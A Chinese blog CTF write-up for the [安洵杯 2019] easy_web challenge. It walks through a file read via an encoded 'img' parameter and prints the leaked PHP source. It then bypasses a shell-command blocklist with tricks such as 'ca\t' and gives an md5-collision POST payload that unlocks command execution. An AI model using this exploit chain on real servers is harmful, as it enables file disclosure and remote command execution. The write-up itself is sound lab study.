[安洵杯 2019]easy_web1

最新推荐文章于 2024-08-09 14:13:54 发布
最新推荐文章于 2024-08-09 14:13:54 发布
阅读量964 收藏 22
点赞数 19
文章标签: android web安全 python php 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alwtj/article/details/140298347
版权

知识点:

        1.base64加解密

        2.md5加解密

        3.md5碰撞绕过强类型比较

        4.Linux命令绕过

进入页面发现url地址中存在 img参数和一个cmd参数,img参数看上去像是base64编码,可以去尝试一下解码.

进行了两次base64解密得到3535352e706e67看着像16进制那么在进行一次十六进制字符串转换得到555.png,像是文件读取漏洞.

我们可以尝试读取index.php的内容,对index.php进行一次16进制转换在进行2次base64加密

最终得到结果为TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

开始构造payload

http://2f95244f-7628-48a4-ba7d-3dc585b47cfd.node5.buuoj.cn:81/index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd=

PD9waHAKZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH4gRV9OT1RJQ0UpOwpoZWFkZXIoJ2NvbnRlbnQtdHlwZTp0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCcpOwokY21kID0gJF9HRVRbJ2NtZCddOwppZiAoIWlzc2V0KCRfR0VUWydpbWcnXSkgfHwgIWlzc2V0KCRfR0VUWydjbWQnXSkpIAogICAgaGVhZGVyKCdSZWZyZXNoOjA7dXJsPS4vaW5kZXgucGhwP2ltZz1UWHBWZWs1VVRURk5iVlV6VFVSYWJFNXFZejAmY21kPScpOwokZmlsZSA9IGhleDJiaW4oYmFzZTY0X2RlY29kZShiYXNlNjRfZGVjb2RlKCRfR0VUWydpbWcnXSkpKTsKCiRmaWxlID0gcHJlZ19yZXBsYWNlKCIvW15hLXpBLVowLTkuXSsvIiwgIiIsICRmaWxlKTsKaWYgKHByZWdfbWF0Y2goIi9mbGFnL2kiLCAkZmlsZSkpIHsKICAgIGVjaG8gJzxpbWcgc3JjID0iLi9jdGYzLmpwZWciPic7CiAgICBkaWUoInhpeGnvvZ4gbm8gZmxhZyIpOwp9IGVsc2UgewogICAgJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsKICAgIGVjaG8gIjxpbWcgc3JjPSdkYXRhOmltYWdlL2dpZjtiYXNlNjQsIiAuICR0eHQgLiAiJz48L2ltZz4iOwogICAgZWNobyAiPGJyPiI7Cn0KZWNobyAkY21kOwplY2hvICI8YnI+IjsKaWYgKHByZWdfbWF0Y2goIi9sc3xiYXNofHRhY3xubHxtb3JlfGxlc3N8aGVhZHx3Z2V0fHRhaWx8dml8Y2F0fG9kfGdyZXB8c2VkfGJ6bW9yZXxiemxlc3N8cGNyZXxwYXN0ZXxkaWZmfGZpbGV8ZWNob3xzaHxcJ3xcInxcYHw7fCx8XCp8XD98XFx8XFxcXHxcbnxcdHxccnxceEEwfFx7fFx9fFwofFwpfFwmW15cZF18QHxcfHxcXCR8XFt8XF18e3x9fFwofFwpfC18PHw+L2kiLCAkY21kKSkgewogICAgZWNobygiZm9yYmlkIH4iKTsKICAgIGVjaG8gIjxicj4iOwp9IGVsc2UgewogICAgaWYgKChzdHJpbmcpJF9QT1NUWydhJ10gIT09IChzdHJpbmcpJF9QT1NUWydiJ10gJiYgbWQ1KCRfUE9TVFsnYSddKSA9PT0gbWQ1KCRfUE9TVFsnYiddKSkgewogICAgICAgIGVjaG8gYCRjbWRgOwogICAgfSBlbHNlIHsKICAgICAgICBlY2hvICgibWQ1IGlzIGZ1bm55IH4iKTsKICAgIH0KfQoKPz4KPGh0bWw+CjxzdHlsZT4KICBib2R5ewogICBiYWNrZ3JvdW5kOnVybCguL2JqLnBuZykgIG5vLXJlcGVhdCBjZW50ZXIgY2VudGVyOwogICBiYWNrZ3JvdW5kLXNpemU6Y292ZXI7CiAgIGJhY2tncm91bmQtYXR0YWNobWVudDpmaXhlZDsKICAgYmFja2dyb3VuZC1jb2xvcjojQ0NDQ0NDOwp9Cjwvc3R5bGU+Cjxib2R5Pgo8L2JvZHk+CjwvaHRtbD4= 

将读取到的内容进行base64解码~

<?php  
// 开启错误报告,但忽略E_NOTICE级别的错误  
error_reporting(E_ALL || ~E_NOTICE);  
// 设置内容类型为HTML,并指定字符集为UTF-8  
header('content-type:text/html;charset=utf-8');  
  
// 从GET请求中获取cmd参数  
$cmd = $_GET['cmd'];  
  
// 检查是否同时设置了img和cmd参数,如果没有,则重定向回index.php并附带默认的img和空的cmd参数  
if (!isset($_GET['img']) || !isset($_GET['cmd'])) {  
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');  
    exit; // 加上exit防止后续代码执行  
}  
  
// 对GET请求中的img参数进行两次base64解码,然后hex2bin转换  
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));  
  
// 使用正则表达式清理$file变量,只保留字母、数字和小数点  
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);  
  
// 检查清理后的$file变量是否包含'flag'字符串,如果包含,则显示一张图片并终止执行  
if (preg_match("/flag/i", $file)) {  
    echo '<img src ="./ctf3.jpeg">';  
    die("xixiï½ no flag");  
} else {  
    // 读取$file指向的文件内容,将其base64编码,并嵌入到HTML中以图片形式显示  
    // 注意:这里假设文件是GIF格式,但实际上可能不是,这可能导致浏览器无法正确显示图片  
    $txt = base64_encode(file_get_contents($file));  
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";  
    echo "<br>";  
}  
  
// 直接输出cmd参数的值  
echo $cmd;  
echo "<br>";  
  
// 使用正则表达式检查cmd参数中是否包含可能被用于恶意命令执行的关键字  
// 如果包含,则输出禁止信息  
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {  
    echo("forbid ~");  
    echo "<br>";  
} else {  
    // 检查POST请求中的a和b参数,如果它们字符串不相等但MD5哈希值相等,则执行cmd参数指定的命令  
    // 这利用了MD5哈希的某些特定输入(如数组或非常大的字符串)的碰撞特性  
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {  
        echo `$cmd`; // 注意:这里直接使用反引号执行命令,存在严重的安全漏洞  
    } else {  
        echo ("md5 is funny ~");  
    }  
}  
  
// HTML部分,定义了页面的样式和背景图片  
?>  
<html>  
<style>  
  body{  
   background:url(./bj.png)  no-repeat center center;  
   background-size:cover;  
   background-attachment:fixed;  
   background-color:#CCCCCC;  
}  
</style>  
<body>  
</body>  
</html>

开始代码审计~

<?php
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;   //将cmd当成系统命令执行并输出
    } else {
        echo ("md5 is funny ~");
    }
}

?>

我们需要绕过两个关卡,首先是preg_match()绕过,其次就是md5强类型比较绕过~

preg_math()绕过Linux命令我们可以通过dir, ca\t 来绕过.

md5强类型比较绕过我们可以通过md5碰撞来绕过,但不能通过数组来绕过,因为这里用了string的强转换,所有数组会被转换为Array.

使用md5碰撞开始构造payload.

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

那么我们开始注入~

  

 

alwtj
关注
  • 19
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[安洵 2019]easy_web详解
weixin_61995249的博客
10-03 720
靶场:https://www.nssctf.cn/problem/732。
[安洵 2019]easy_web 1
weixin_53150482的博客
07-15 624
[安洵 2019]easy_web 1
[安洵 2019]easy_web
pakho_C的博客
04-17 3987
web第43题 [安洵 2019]easy_web 打开靶场 发现有命令执行的可能 在cmd参数中做尝试: 尝试了很多命令,发现基本都被过滤了 转换思路: img参数可以根据值进行读取,那么cmd参数可能同样可行,尝试对img参数的值base64解密 解密两次后发现一串字符 经过观察应该是16进制,转字符得到555.png: 按照此规则构造index.php的加密,然后作为img参数的值,那么理论上可以引入index.php文件 将TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
BUUCTF WEB [安洵 2019]easy_web
Y1da的博客
05-02 826
BUUCTF WEB [安洵 2019]easy_web 题目链接 BUUCTF在线评测 题目源码 i-SOON_CTF_2019/Web/easy_web at master · D0g3-Lab/i-SOON_CTF_2019 解题思路 进入环境后F12查看网页源代码 <html> <head></head> <body> <img src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAKgAAA
BUUCTF-[安洵 2019]easy_web1
Monica的博客
11-09 1537
题目 分析 页面啥也没有,日常查看源代码 蓝色的东西有一大串,前面写着data:image/gif;base64 知识点: Data URI scheme data:image/png;base64的使用_凉茶微凉-CSDN博客 data:image/png;base64 - 心存善念 - 博客园 目的是将一些小的数据,直接嵌入到网页中,从而不用再从外部文件载入 其实“data:image/gif;base64,R0lGODlhJ……” 就是一张图片的DataURL,就是利用
buuctf_练[安洵 2019]easy_web
m0_66225311的博客
10-28 3941
`url`地址和源代码的信息捕捉;图片和`base64`之间转换;`base64`和十六进制编码的了解;代码审计,绕过正则匹配对关键字的过滤;MD5碰撞,`md5`参数强转类型的强等于绕过
【BUUCTF】[安洵 2019]easy_web
aoao331198的博客
04-30 1838
开幕破防属于是。。。 观察url http://dc66bac4-e3ff-492e-b89e-6ddf6f65ab2b.node4.buuoj.cn:81/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= img后面的像是一个base64加密后的字符串,cmd参数没有,尝试输入什么每什么反应,那就对这个字符串下手 显然还要进行一次 一串数字,hex解码 是一个图片名,可以推断存在任意文件读取漏洞,我们将index.php进行hex->b.
[安洵 2019]easy_serialize_php
2301_81040377的博客
07-21 406
欸那么为什么要加一个属性呢,这里回到最开始的测试,题目本身自带了user和function,而获取flag还要有img,所以有三个属性,才能正常反序列化,少了一个当然不行。少了字符,但是反序列化是不会停止的,他会持续的往后推移吃掉所需要的字符。之前学过字符串逃逸但是又可能是不懂底层原理吧这道题卡了很久。此时少了24个字符就会往后面补吞24个字符。这是结束的标志所以这里这段代码就可以看出。本地环境是由字符替换为空,那么就会少字符。之后的内容直接被丢弃了,无伤大雅。刚好20个不用重新构造。
BUUCTF [安洵 2019]easy_serialize_php
weixin_73399382的博客
07-25 990
然而因为filter函数的过滤,将php和flag过滤掉,因为指定的键名长度为10,产生了字符串逃逸,我们在后面随便添加几个垃圾字符让它往后读取形成一个新的键名,形成一个键值对,如下所示是payload过滤加上字符串逃逸后形成的序列化数据。php反序列化的过程中必须严格按照序列化规则才能成功实现反序列化,如果出现这种情况s:10:"flag",键名长度为4,但规定长度为10,就会造成字符串逃逸向后读取,这里是我们解题的关键。s:3:"img";后面代码中先进行序列化操作,原本的序列化数据应该为。
web_easy_
09-30
【标题】"web_easy_" 指的可能是一款基于Web的用户界面皮肤,它经过了定制化设计,以满足特定客户的需求。"web"通常代表Web应用或网站,而"_easy_"部分可能意味着这款皮肤追求的是简洁易用的用户体验。 在Web开发中...
easy_web_view:在移动和Web上轻松浏览Web视图!
02-04
easy_web_view 在Flutter网站和移动设备上轻松浏览Web! 支持HTML内容或单个元素 支持降价来源 支持转换为Flutter小部件 支持远程下载URL Markdown-> HTML HTML-> Markdown 支持更改URL 可选文字 如果您提供...
pasecactf_2019_web_honey_shop
05-04
PASECA2019_Web_honey_shop 题目详情 PASECA CTF 2019 Web honey_shop Difficulty: Easy 考点 LFI Flask Cookie伪造 启动 docker-compose up -d open 题目说明 Flag位于app/flag.txt,Docker中位于/app/flag.txt。 ...
2.rar_1T16_dwt_easy _noiseb5p
07-14
matlab cod fore DWT very Easy
Easy_draw.rar_easy _easy draw_easydraw
09-24
【标题】"Easy_draw.rar" 是一个压缩包文件,其中包含了一个名为 "easy draw" 或 "EasyDraw" 的简易图像处理软件。这个软件是专为编程初学者设计的,旨在帮助他们入门图形用户界面(GUI)开发和图像处理技术。 ...
Chromium编译指南2024 - Android篇:前置要求(一)
最新发布
守城小轩的技术窝棚
08-09 476
通过本篇文章,我们详细介绍了在 Android 平台上编译 Chromium 所需的前置要求,包括系统和硬件要求。确保您的开发环境满足这些要求,是成功编译 Chromium 的关键步骤。我们讨论了使用 Ubuntu 24.04 LTS 操作系统、安装 Git 和 Python 等必要软件,以及配备足够的 RAM 和磁盘空间的重要性。同时,我们强调了稳定高速的网络条件对于下载和同步源代码的影响。
Android12修改设备名称
08-09 296
Android12 修改设备名称
Android14音频进阶调试之命令播放mp3/aac非裸流音频(八十)
Android系统攻城狮
08-06 1115
本篇目的:Android14上,当我们没有app,又想测试mp3、aac、wav等音频时,这时候我们可以使用stagefright解码、播放音频文件。Stagefright 是 Android 系统中的一个多媒体框架,用于处理各种音频和视频文件格式。它提供了解析、解码、编码和播放多媒体内容的功能。Stagefright 框架包括多种组件和库,负责不同的多媒体处理任务。通过 Stagefright,Android 设备能够高效地播放和处理多媒体内容。
永久删除的Android 文件去哪了?在Android上恢复误删除的消息和照片方法?
qq_23996309的博客
08-06 1025
丢失重要消息和照片可能是一种令人沮丧的经历,尤其是在您没有备份的情况下。但别担心,在本教程中,我们将指导您完成在Android设备上恢复已删除消息和照片的步骤。无论您是不小心删除了它们还是由于软件问题而消失了,这些步骤都可以帮助您检索宝贵的数据。
[安洵 2019]easy_serialize_php 1
03-16
这是一道 PHP 序列化题目,需要我们对 PHP 的序列化机制有一定的了解。 题目给出了一个序列化后的字符串,我们需要将其反序列化成 PHP 对象,并修改其中的某个... 具体的操作步骤可以参考以下代码: ... class User { ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值